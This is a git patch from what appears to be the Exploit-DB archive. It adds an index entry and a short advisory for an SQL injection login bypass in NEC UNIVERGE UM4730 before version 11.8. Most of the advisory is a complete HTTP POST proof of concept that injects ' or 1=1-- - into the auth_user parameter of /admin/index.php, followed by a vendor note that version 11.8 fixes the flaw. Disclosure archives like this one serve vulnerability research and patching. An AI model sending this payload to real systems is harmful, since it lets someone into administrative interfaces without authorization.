From 10a46aac45934322a9064a6ab9f698352003db0c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 22 Jul 2017 05:01:21 +0000
Subject: [PATCH] DB: 2017-07-22

1 new exploits

NEC UNIVERGE UM4730 < 11.8 - SQL Injection
---
 files.csv                       |  1 +
 platforms/php/webapps/42353.txt | 29 +++++++++++++++++++++++++++++
 2 files changed, 30 insertions(+)
 create mode 100755 platforms/php/webapps/42353.txt

diff --git a/files.csv b/files.csv
index 261663f97..fd18cfab3 100644
--- a/files.csv
+++ b/files.csv
@@ -38156,3 +38156,4 @@ id,file,description,date,author,platform,type,port
 42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
 42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0
 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0
+42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0
diff --git a/platforms/php/webapps/42353.txt b/platforms/php/webapps/42353.txt
new file mode 100755
index 000000000..8c14f36b5
--- /dev/null
+++ b/platforms/php/webapps/42353.txt
@@ -0,0 +1,29 @@
+# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
+# Vulnerbility: SQL injection login bypass
+# Date: 15-12-2016
+# Exploit Author: b0x41s
+# Author web: https://www.xrayit.nl
+# Vendor Homepage: https://www.nec-enterprise.com
+# Category: webapps
+# Version: 11.6.0.31
+# Tested on: Windows server 2008
+
+Description:
+The auth_user parameter is vulnerable to SQL injection.
+The login can be bypassed.
+
+POC:
+POST /admin/index.php HTTP/1.1
+Host: 127.0.0.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: https://127.0.0.1/admin/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Lenght: 105
+Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en
+submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de
+
+Fix answer from vendor:
+The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.
\ No newline at end of file